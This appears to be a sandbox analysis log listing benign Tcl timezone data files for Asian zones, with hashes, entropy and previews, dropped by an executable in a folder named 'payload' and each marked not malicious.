                                                                                                                                                                                                                                            SHA-512:A5389A318896ABCAFE419262F6B8CA86C917788F1E2AFBC8CB1C074A52870E7A92C9F6F7D79DDE4AB0D267D870D3CCD69B3FC5FD57520352EFE36C583B493FB9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kathmandu) {.. {-9223372036854775808 20476 0 LMT}.. {-1577943676 19800 0 +0530}.. {504901800 20700 0 +0545}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.8363583658476745
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8yIi7V5XHAIgN1AIilvWARL/2WFKSiZ1/2WFKXIi7y:SlSWB9vsM3y7gVJHAIg5QOAN/2wKSg15
                                                                                                                                                                                                                                            MD5:4CCC96293A33113D9ADC4130DCD19CBA
                                                                                                                                                                                                                                            SHA1:7BAB4B8DD6BB415A2FC86D9AB36BE2A893C03153
                                                                                                                                                                                                                                            SHA-256:9ACC9586B6F8B53BFE8B242283A434A9A9633D60559EBFDEE263B4C8915D50CA
                                                                                                                                                                                                                                            SHA-512:644E1777E01C15A728E30526F131462FCE50476A8FEDA9B99F41D95013BB8833A79437E75AA2025E2FD2E253B9AD40709DEF77E1F0C73DAAE7A9CF886A175A03
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kathmandu)]} {.. LoadTimeZoneFile Asia/Kathmandu..}..set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2119
                                                                                                                                                                                                                                            Entropy (8bit):3.707911838150672
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5No6r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFYkRDhUBAc6l:r5PhtjLiII2JBC6c6l
                                                                                                                                                                                                                                            MD5:D7B394A9662D60D01781005FE73CC9E8
                                                                                                                                                                                                                                            SHA1:50B5EBD02596DC45D1F69358C5B69DD3058905FC
                                                                                                                                                                                                                                            SHA-256:33203D7FB7F3D1F848640ECE0642A2305E1863B4D47413075E2E7E40BD7418E7
                                                                                                                                                                                                                                            SHA-512:055EBA420F2F6049E803796ACCA263264B9E585E5312A86B8DF7B409C5F1CB1810F3AEDACD66CCF4605E55198947D263C240486C2A4D453D23C89802F0C66BBA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Khandyga) {.. {-9223372036854775808 32533 0 LMT}.. {-1579424533 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                                                                                            Entropy (8bit):4.614218930153471
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKvhfDm2OHEX3gYoHrXdUvvYbQLpUFdvjSVVFJLNsR/QFckVVFJLLW:MB8623tmdHNYCDWXYbQtUTvjAJBs50vs
                                                                                                                                                                                                                                            MD5:248F1B5A26455000C936CE8BC02C1A0B
                                                                                                                                                                                                                                            SHA1:0C3F8CD4E038B113E5238AC52652809B6CA27999
                                                                                                                                                                                                                                            SHA-256:6D464564ED2EFC9DADA1586D4FC99FE333726D2BE15A00E30C2391F588896463
                                                                                                                                                                                                                                            SHA-512:AF36B0B3D410305ED504726C87265ACCAF5577A9B5DD7E7DAF135420E356C651287873197431B65B5317B4BA2009274288E4F101AC1274045A8D99E2414AB132
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kolkata) {.. {-9223372036854775808 21208 0 LMT}.. {-3645237208 21200 0 HMT}.. {-3155694800 19270 0 MMT}.. {-2019705670 19800 0 IST}.. {-891581400 23400 1 +0630}.. {-872058600 19800 0 IST}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 IST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2062
                                                                                                                                                                                                                                            Entropy (8bit):3.7086418466382605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Ote2CoXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEw:5B40yVRB7VfXucydm46I/CTxwh
                                                                                                                                                                                                                                            MD5:A59F7FFD0C3EBAD47EC5F2B89EBBD9FA
                                                                                                                                                                                                                                            SHA1:ACB94E28E0CF7C6606086267CEA1F63A3E755F56
                                                                                                                                                                                                                                            SHA-256:53B8D5E7FB1BD67FECE66A933D9BDBB773F14A8C04D316A2A1B00EC6DBC151DD
                                                                                                                                                                                                                                            SHA-512:7B3886B9D0A793CCEEDB2B190523922CFEBE5C82A5201C9EFA30CA4C7F63FB75C998CC7E1BD48D5D489F16E36FC0C22BD954CB7D321B3C09B36B60629C4C9F7E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Krasnoyarsk) {.. {-9223372036854775808 22286 0 LMT}.. {-1577513486 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.956557779400841
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/2WFK1NFWFKf1z:SlSWB9vsM3yUgHAIgWv6N/2wK1NFwKf9
                                                                                                                                                                                                                                            MD5:E70767DA85A7E1FA9395FF0B16CFE5CE
                                                                                                                                                                                                                                            SHA1:3F78034F166CFC80B54E56AF289C7700A7E4AA5C
                                                                                                                                                                                                                                            SHA-256:056D352DDCFEC155375430FFF3C8743ED5C9B51B866A099E97E12CC381071F50
                                                                                                                                                                                                                                            SHA-512:FEDC854FB043AA79F132827F98F8983E480727FAA039CF2FB5B82611E724312A4F3F006EE58707F12B0AA90F5872E17F76E2A040CFB3A90D017C5CF92E52DA0A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Asia/Kuala_Lumpur) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):669
                                                                                                                                                                                                                                            Entropy (8bit):4.074079100812583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKPLBDm2OHXoH3UTdMVSSFVM5qGeCiKaFzsBRcerUNwGvULhMXeiCs:MB862HL1mdHXC3UBMxJJo9rphTXUzHHF
                                                                                                                                                                                                                                            MD5:489E706324960E86B6E174D913C72E02
                                                                                                                                                                                                                                            SHA1:C7D77482C0D41F3426FC269B3B6C0575EF0E8C7E
                                                                                                                                                                                                                                            SHA-256:6E35E560675B0B5322474900D4EC8326C504788C1F82E533B09785DEEFF092DF
                                                                                                                                                                                                                                            SHA-512:5CEFD44656C041E59A16481E042EA914E7C003BDE6ADF5F49B57052E91F4F732A91A244BD8BC09EF5DC2640D3210DEE53882717C5C4CBD85CCE44A93B028E9C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kuching) {.. {-9223372036854775808 26480 0 LMT}.. {-1383463280 27000 0 +0730}.. {-1167636600 28800 0 +08}.. {-1082448000 30000 1 +08}.. {-1074586800 28800 0 +08}.. {-1050825600 30000 1 +08}.. {-1042964400 28800 0 +08}.. {-1019289600 30000 1 +08}.. {-1011428400 28800 0 +08}.. {-987753600 30000 1 +08}.. {-979892400 28800 0 +08}.. {-956217600 30000 1 +08}.. {-948356400 28800 0 +08}.. {-924595200 30000 1 +08}.. {-916734000 28800 0 +08}.. {-893059200 30000 1 +08}.. {-885198000 28800 0 +08}.. {-879667200 32400 0 +09}.. {-767005200 28800 0 +08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                                                            Entropy (8bit):4.877362838821003
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFKdQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKdQ6
                                                                                                                                                                                                                                            MD5:EA1DB4B80CC74CBA024B9BF3734B31F2
                                                                                                                                                                                                                                            SHA1:D8131C093BCA3B378BEC606CFEB56A40CB4E246F
                                                                                                                                                                                                                                            SHA-256:8E0C60A9AA64FB8602EDC35311F7436B04853970A21C1F6C871494A09AAD5787
                                                                                                                                                                                                                                            SHA-512:3B57C9CCC16AA4FE71D275D5EC6A7BC1838841023EE4408158362A7E13E7F1B345F7D95006BC8D2FC270158864E286A1A9364C792F679D5803BD82148399C199
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):169
                                                                                                                                                                                                                                            Entropy (8bit):4.781739054385376
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8PWXHAIgNz+NOARL/2WFKf+WFKkvn:SlSWB9vsM3yOHAIg1AN/2wKGwKmn
                                                                                                                                                                                                                                            MD5:55DAE27AEAA74FE822338C20B6CDFF68
                                                                                                                                                                                                                                            SHA1:F00EB827DC29EB2063B3A0EDBC39856637C55F33
                                                                                                                                                                                                                                            SHA-256:4308D741C83B263C7C9FB8EC692A7B7B502135E407B265B12EA7EF92523455C0
                                                                                                                                                                                                                                            SHA-512:398EE6015C58BDBBEAB49B74833B938FD84DE1AC6D3B8D095CE772ECA980D9E93F4EBFFFFCEAE7F91E287C8CE4F94B1A078D8E1460C352B7C2018F99915838FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Macau)]} {.. LoadTimeZoneFile Asia/Macau..}..set TZData(:Asia/Macao) $TZData(:Asia/Macau)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2217
                                                                                                                                                                                                                                            Entropy (8bit):3.9638741177777868
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5ReCX8Iv3nhPHCvzncCHg9PHjZzH+0HDHN1aHhHNaezHBjHeHsH65H18HDH983lY:5d8u3hfCTcaOrh6qn151Wf3Bogp+nlC
                                                                                                                                                                                                                                            MD5:B184E7403CB7168607D2C9E158F86A3B
                                                                                                                                                                                                                                            SHA1:48B003B8F822BE979FBCB08CBDBFFC617BCF99DB
                                                                                                                                                                                                                                            SHA-256:FBCB92CECB1CB0BC284ADC30D70C5F57B3AFC992136A0D898ABC64490BB700FB
                                                                                                                                                                                                                                            SHA-512:D8C5C67CAEB7C670B7BD1DACC1203C4DEE4DDB16A780F502C4440997CFCFF869E86842EF87C2CD0E0B942941C02A6BC3BDAB7CEAD78B026B68F4A031173400C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Macau) {.. {-9223372036854775808 27250 0 LMT}.. {-2056692850 28800 0 CST}.. {-884509200 32400 0 +09}.. {-873280800 36000 1 +09}.. {-855918000 32400 0 +09}.. {-841744800 36000 1 +09}.. {-828529200 32400 0 +10}.. {-765363600 28800 0 CT}.. {-747046800 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716461200 32400 1 CDT}.. {-697021200 28800 0 CST}.. {-683715600 32400 1 CDT}.. {-667990800 28800 0 CST}.. {-654771600 32400 1 CDT}.. {-636627600 28800 0 CST}.. {-623322000 32400 1 CDT}.. {-605178000 28800 0 CST}.. {-591872400 32400 1 CDT}.. {-573642000 28800 0 CST}.. {-559818000 32400 1 CDT}.. {-541674000 28800 0 CST}.. {-528368400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-498128400 32400 1 CDT}.. {-478774800 28800 0 CST}.. {-466678800 32400 1 CDT}.. {-446720400 28800 0 CST}.. {-435229200 32400 1 CDT}.. {-415258200 28800 0 CST}.. {-403158600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2088
                                                                                                                                                                                                                                            Entropy (8bit):3.7643610103361134
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5he9dbbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKx/y:5wv+0j6lua2Gg/3gO8UoOZU2Wc/pKo
                                                                                                                                                                                                                                            MD5:F62A89F441C9C17EB99F64223C815651
                                                                                                                                                                                                                                            SHA1:408C38A79E056FF9B03D0DA85114DC015CB66938
                                                                                                                                                                                                                                            SHA-256:0C6EEEB7975A95C2B0678D137E6A735238D244A37FA11078050051511DE499FE
                                                                                                                                                                                                                                            SHA-512:55DC72546BDC26450D5318E9D2819E32A91C27D06A7AF5432BD50F8722C69984BBAA8599055A824D2935D919F0C0AA357687DD9B47F49F213EEE21AF7458FE17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Magadan) {.. {-9223372036854775808 36192 0 LMT}.. {-1441188192 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):243
                                                                                                                                                                                                                                            Entropy (8bit):4.737440985553183
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wK5XDm2OHUVoHxYQTLQTvj1kc3gEpHkH8vScHr0:MB862hTmdHsCLTI6cQe7HHA
                                                                                                                                                                                                                                            MD5:9116C0B70AB33EC49F933EAE0238FD4B
                                                                                                                                                                                                                                            SHA1:BA390E8FBEAF5EA6E861AFC5A51CD4DF0B422461
                                                                                                                                                                                                                                            SHA-256:30D8AB00E32ECE51442C0310E650D89D6989E0809600EE334CB10C506D84BF9D
                                                                                                                                                                                                                                            SHA-512:499E60E8CBDA72226BCB4E241020E62B6F88E7D3E4329D260A6536EF87C02D7D61FD1BECC47D4FF308B4EB5D3E7FFBE2EC1C96FE2DEDC09DD1D973421C5FFE1E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Makassar) {.. {-9223372036854775808 28656 0 LMT}.. {-1577951856 28656 0 MMT}.. {-1172908656 28800 0 +08}.. {-880272000 32400 0 +09}.. {-766054800 28800 0 WITA}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):421
                                                                                                                                                                                                                                            Entropy (8bit):4.48495488773916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862GjmdHnCTZBCvEo6AwoucQzy4orjAbomAtoNv:5GjeCVwvB6AduXzylHAMmAa9
                                                                                                                                                                                                                                            MD5:0FBF0ED252638DF31826C33EB3FFBFE2
                                                                                                                                                                                                                                            SHA1:3496E4A5251A9BDF3AA4368297140780B6DBF66D
                                                                                                                                                                                                                                            SHA-256:070D61A0E39643A700ABA89A8A4BE5733BA456958966098405E11ECDFA854D76
                                                                                                                                                                                                                                            SHA-512:2A40E14964B357809E596DF88D8C4141ED78664BACA0A7724A7CA837EF427DC2B07C48D9DBE5787FAB0015673F5BDE002223D489334C5B91B74EEC5507A14B78
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Manila) {.. {-9223372036854775808 -57360 0 LMT}.. {-3944621040 29040 0 LMT}.. {-2229321840 28800 0 PST}.. {-1046678400 32400 1 PDT}.. {-1038733200 28800 0 PST}.. {-873273600 32400 0 JST}.. {-794221200 28800 0 PST}.. {-496224000 32400 1 PDT}.. {-489315600 28800 0 PST}.. {259344000 32400 1 PDT}.. {275151600 28800 0 PST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.805992552335358
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/2WFKvE+H+WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/2wKLewKQ3
                                                                                                                                                                                                                                            MD5:8AEB5C3E81069F884A370714E8013F1F
                                                                                                                                                                                                                                            SHA1:4E3DD4A84627E75E84726C0CBA72CA6801280C2B
                                                                                                                                                                                                                                            SHA-256:011B7DE1C9F7EC241B224BC864D8AE66ACB433FBC8AD939E4DBEB12BE6390243
                                                                                                                                                                                                                                            SHA-512:50B1DE2615AE9B4781505DC709F9D07F6221D4E6D7B61D7BDA682377EAD9807F47FF0E933B79823D0DFD9F3647A82CFC28FB41FBB2226ED1D08B76F86FEB45DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Asia/Muscat) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7625
                                                                                                                                                                                                                                            Entropy (8bit):3.7113086720696398
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:R3pv/7V6Aj8aZaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:R3v/AauivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:2ADD0DFC1F133E4D044727234251A3DC
                                                                                                                                                                                                                                            SHA1:0D1502986258349E384017BA6CB8FA0AC424638C
                                                                                                                                                                                                                                            SHA-256:3C3E4844C70D361893EF022D6C3C8E38B243E91D40C5A726C924355476816F25
                                                                                                                                                                                                                                            SHA-512:70CDD53E7E44EDABF653A4F92EECBF5BB20A31DA95D65209D1CADE7DD9FC68946B8EC8829C28AE00BE5F42AAB545B9282CBBCFC5834437D6A94A179BF4FE0141
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Nicosia) {.. {-9223372036854775808 8008 0 LMT}.. {-1518920008 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {62258760
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2063
                                                                                                                                                                                                                                            Entropy (8bit):3.718004112421892
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:526enddzXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFf:5l40yVRB7VfXucydm46I/CTxwf
                                                                                                                                                                                                                                            MD5:513B6A2AF76DAED9002C037BEC99862F
                                                                                                                                                                                                                                            SHA1:82D1C47BDF46B8B901C35BACACE8595C093BF5F2
                                                                                                                                                                                                                                            SHA-256:96A445D47D834C28480D1E2036ECA4962B35AFA494C219065D4879F71C1830DB
                                                                                                                                                                                                                                            SHA-512:2FE5AF4FA9D6AAB4FBD8E354789B82D39FA1B52394D3A0ABFBC6A30A531E0B7429A3D9AC7835A2843A6E9859E0255565F151FDFC87004ACB4EBD1AAD40BDA8A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novokuznetsk) {.. {-9223372036854775808 20928 0 LMT}.. {-1441259328 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2121
                                                                                                                                                                                                                                            Entropy (8bit):3.714792994893581
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:52sve20ruXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnF:5Hc40yVRB7VfXu0TKmtTTDOWQ
                                                                                                                                                                                                                                            MD5:AC8C8D768503C8334A9FBAEF4C3A9CAB
                                                                                                                                                                                                                                            SHA1:CA10BB99E2D7AB329229759BD4801068A3AEB6D5
                                                                                                                                                                                                                                            SHA-256:EF799077291F6B3B19E0AEC88F224BB592FAAD09D30740F2376D3D20F2169639
                                                                                                                                                                                                                                            SHA-512:34049B1AC4254F999C3E5AD8CB31ABF88AC2D972E20E19927F33CC59935354F92125A0342A413E64227E8AE29DDFC2FFE5F67AE538C89D8EBAD7FCA889321DFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novosibirsk) {.. {-9223372036854775808 19900 0 LMT}.. {-1579476700 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {738090000 25200 0 +07}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
